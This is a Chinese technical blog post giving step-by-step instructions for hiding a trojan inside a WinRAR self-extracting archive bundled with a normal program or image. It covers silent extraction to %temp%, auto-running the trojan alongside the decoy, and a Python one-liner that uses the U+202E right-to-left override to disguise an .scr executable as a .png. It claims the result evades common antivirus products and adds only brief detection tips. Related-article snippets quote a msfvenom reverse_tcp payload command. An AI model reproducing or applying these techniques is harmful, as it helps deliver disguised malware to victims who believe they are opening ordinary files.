ATT&CK防御绕过-木马隐藏捆绑技术-winrar自解压和文件名反转

最新推荐文章于 2024-07-16 15:11:55 发布
最新推荐文章于 2024-07-16 15:11:55 发布
阅读量2.9k 收藏 38
点赞数 3
分类专栏: ATT&CK防御绕过 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013797594/article/details/124671389
版权

木马隐藏技术-winrar自解压和文件名反转

介绍2个有趣的木马隐藏技术,免杀效果也非常棒,主要利用到winrar的自解压功能。

一.木马捆绑到普通程序

原理

1.winrar压缩功能可以设置自动解压并且自动运行里面的程序,使用自解压功能会把文件制作为exe程序,运行后会将文件解压到指定路径,并运行指定文件。

特点:简单、可以做免杀、可以捆绑到各种正常程序上

制作

准备图标、免杀的木马后门(命名不要有空格)、正常程序(命名不要有空格)、winrar:

image-20220507125651288

1.添加到winrar压缩文件:

(正常文件和木马添加到压缩,勾选自动解压功能)

image-20220507125806813

image-20220507125825581

2.设置自动解压文件存放的路径:

(可以放到tmp目录中,%temp%指得是windows的temp目录)

image-20220507131317394

3.设置自动运行的程序:

(自动运行木马和正常程序vpn)

image-20220507131627038

4.隐藏解压进度:

image-20220507125938925

5.设置logo:

image-20220507130257108

6.设置解压缩时如果文件已经存在则自动跳过(否则会提示是否覆盖文件)

image-20220507130806816

测试效果

直接运行:

和普通程序完全一样,多次运行也感觉不出差异,木马后门和普通程序一起运行了,并且免杀360和火绒:

image-20220507132256305

用工具分析文件:

就是普通的PE程序,看不出区别,winrar应该就是把这几个文件装到PE程序里面,利用PE程序解压出来:

image-20220507132427236

image-20220507132819866

防御方法

1.十六进编辑器查看或者分析二进制应该是可以发现自动解压缩程序的特征的,使用binwalk可以分离出文件:

image-20220507150935364

2.木马文件会解压缩到指定目录。

二.木马捆绑到图片中(文件名反转)

原理

1.和上面一个示例一样,使用winrar自解压功能,只不过这里不是自动启动普通程序+木马,而是打开图片+木马

2.可执行程序后缀除了exe,还有msi、sys、scr。

3.文件名可以用中东unicode字符8238或0x202E,这种编码方式就是倒序显示的,把后缀翻转到前面去,让它看起来就是个图片后缀(实际是个PE可执行程序)。

特点:简单、方便制作免杀、由于文件名的反转实际依赖unicode编码,想要扩散给别人依然保留反转的文件名,就需要传输工具和接收方都支持这种unicode编码,因此适用范围很小,比如web传输时会被url编码导致无法保留编码方式。目前测试xftp下载和QQ传输还可以保留反转的文件名。

制作

准备:免杀的木马程序、一张png图片、一张ico图标(要和png看起来一样)

1.添加到winrar压缩文件:

(将png和木马添加到压缩,勾选自动解压功能)

image-20220507142618806

image-20220507142627612

2.设置自动解压文件存放的路径:

(可以放到tmp目录中,%temp%指得是windows的temp目录)

image-20220507131317394

3.设置自动运行的程序:

(自动运行木马和png图片)

image-20220507142729993

4.隐藏解压进度:

image-20220507125938925

5.设置logo:

image-20220507142912378

6.设置解压缩时如果文件已经存在则自动跳过(否则会提示是否覆盖文件)

image-20220507130806816

7.用python修改文件名

import os
os.rename('img.exe',u'\u202Egnp.scr')		#将img.exe重命名为了rcs.png

效果:

image-20220507143354835

测试效果:

直接运行:

光看缩略图信息肉眼无法区分这是图片还是PE程序,多次运行可以多次打开图片:

image-20220507145631180

防御方法

工具可以看出是PE程序,windows查看文件相信信息也很容易看出这并不是一个真的图片:

image-20220507145952084

分析十六进制可以知道是PE程序:

image-20220507150147961

binwalk分离:

(ctf杂项中常用到的binwalk工具,用于自动分离)

并不是一个真的图片:

[外链图片转存中…(img-cXye4rpD-1652089224384)]

分析十六进制可以知道是PE程序:

[外链图片转存中…(img-GRScri93-1652089224384)]

binwalk分离:

(ctf杂项中常用到的binwalk工具,用于自动分离)

image-20220507150901608

black guest丶
关注
  • 3
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
文件名伪装_RLO(红队钓鱼)
qq_44657899的博客
01-25 1693
Rlo,即Right-to-LeftOverride 在文件名中插入此类unicode字符,来达到文件名的效果 将exe文件命名为mdgnp.exe,然后重命名选中md和gnp,之间插入Unicode控制字符RLO 保存文件名,然后更换图标即可
Unicode字符文件名植入攻击实验
yellow_fish_flag的博客
10-30 2159
Unicode字符文件名植入攻击实验 一、 实验目的  理如何通过向对方发送伪造的 Microsoft Office Word 文档来植入木马程序的技术手段。  掌握利用 Unicode 字符特性来捆绑可执行木马构建恶意文档的方法。  了使用 System Safety Monitor(SSM)分析恶意文档的攻击流程。 二、 实验原理 Unicode字符串概述 利用工具生成的“字符串”类型的后门程序,所利用的工具可以自动生成任意伪装后缀名的文件,例如:.txt、.jpg 、.mp
钓鱼&文件名&office远程模板
qq_50854662的博客
05-29 1549
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违国家法律则自行承担全部法律责任,与作者及分享者无关 0x01 件名 在渗透过程中,有时需要通过钓鱼来来传播一些木马文件,而这些木马文件需要精心的伪装。RLO即 Start Of Right-to-Left override。我们可以通过选择插入Unicode控制字符RLO来达到文件名的效果 以CobaltStrike生成的木马BypassA.
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5138
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
捆绑木马上线
weixin_44747030的博客
04-05 2769
捆绑木马 使用CS生成一个木马文件将木马跟一个正常的文件捆绑在一起,当点捆绑生成的EXE文件就会执行木马和正常的文件。 选中木马文件和一个正常的文件,选择添加到缩文件 常规-勾选创建自格式缩文件并修改文件名 高级-点击自选项 常规-填写路径 设置-填写后运行的路径,一个为木马文件的名字一个为正常文件的名字。 模式-全部隐藏 更新-并更新文件-覆盖所有文件 最后点击确定,生成一个Desktop.exe的文件 这个文件的图标可以使用ResourceHacker进行
信息安全技术实践之木马捆绑模拟实验小记
小啊呜的博客
09-22 2751
信息安全技术实践之木马捆绑模拟实验小记 实践任务描述 实现过程记录 叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
利用自文件携带木马程序
weixin_45736806的博客
06-06 841
利用自文件携带木马程序 ** 可能会有不足,如果能告诉我哪里不对,我会非常开心。 **
WinRAR自安装并开机自启
屠龍之技的专栏
02-09 2708
目标文件夹:指在上面创建的目录下继续创建文件夹,而不是另外指定个目标文件夹。隐藏启动对话框:不显示启动对话框,但是会显示过程界面。全部显示:显示启动对话框,用户可选择位置。隐藏全部:全部不显示。
attack-navigator:Web应用程序,提供ATT&CK矩阵的基本导航和注释
04-28
ATT&CK导航器旨在提供矩阵的基本导航和注释,这是当今人们已经在诸如Excel之类的工具中进行的操作。 我们将其设计为简单而通用-您可以使用导航器来可视化您的防御覆盖范围,红色/蓝色团队计划,检测到的技术的频率...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK框架介绍及战技术对照表
05-18
"框架战技术对照表.xlsx"文件提供了方便的安全团队和研究人员对照的表格,列出了所有战术和技术,以及相关的工具和案例,帮助分析和应对攻击行为。同时,"mitre ATT&CK框架简介.pptx"可能包含更深入的讲和示例。 ...
ATT-CK-CN:ATT&CK实操
02-05
【描述】:ATT-CK-CN是基于MITRE的ATT&CK框架的中国针对性版本,它为理防御针对中国境内的网络攻击提供了详细的战术、技术和程序(TTPs)模型。ATT&CK框架是一种知识库,收集了各种先进持续威胁(APT)组织的...
WinRAR捆绑木马
超哥的专栏
04-23 3978
准备好木马文件 server.exe 准备一个小游戏 趣味数学计算 缩 创建自格式缩文件 自选项设置 路径设置 设置程序 模式设置 缩完成 使用 开始玩游戏 ...
亲手实践图片木马捆绑工具(BD2.Net Injector By BD2)
边城浪子的博客
05-15 6415
BD2.Net Injector By BD2工具下载地址: 链接:https://pan.baidu.com/s/1KS_wQjwNpWDFBZCnLMThYA 提取码:cziq 远控木马下载地址: 链接:https://pan.baidu.com/s/16CNDrQ3CCokuFetvSqWnRA 提取码:o1wa 本人测试图片木马上线不成功,木马上线是没有问题的。 ...
网络安全-密WinRAR捆绑恶意程序并自动上线MSF的原理
xueshenlaila的博客
11-15 5369
文章目录生成伪装恶意程序的封面图标捆绑恶意程序和图片并设置自动运行使用Unicode字符修改文件名后缀通过访问图片自动获取目标shell 生成伪装恶意程序的封面图标 需要安装rar缩工具。 WinRAR官网:http://www.winrar.com.cn/ 下载安装即可不需要特殊配置。 msfvenom生成exe ┌──(root????xuegod53)-[~] └─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
入狱小技巧之木马制作——图片木马制作
qq_33168924的博客
09-07 7443
0x01 图片木马制作 0x02 简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 0x03 制作方式 A) 利用windows 命令 准备一个木马,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 534
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
kali实现木马捆绑
10-14
我很抱歉,我不能回答关于制作恶意软件的问题,因为这是不道德和非法的行为。我的设计目的是为了帮助人们决问题和提供有用的信息,而不是鼓励犯罪行为。请问还有其他问题我可以回答吗? 相关问题: 1. 什么是Kali Linux? 2. Kali Linux有哪些常用的安全工具? 3. 如何使用Kali Linux

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值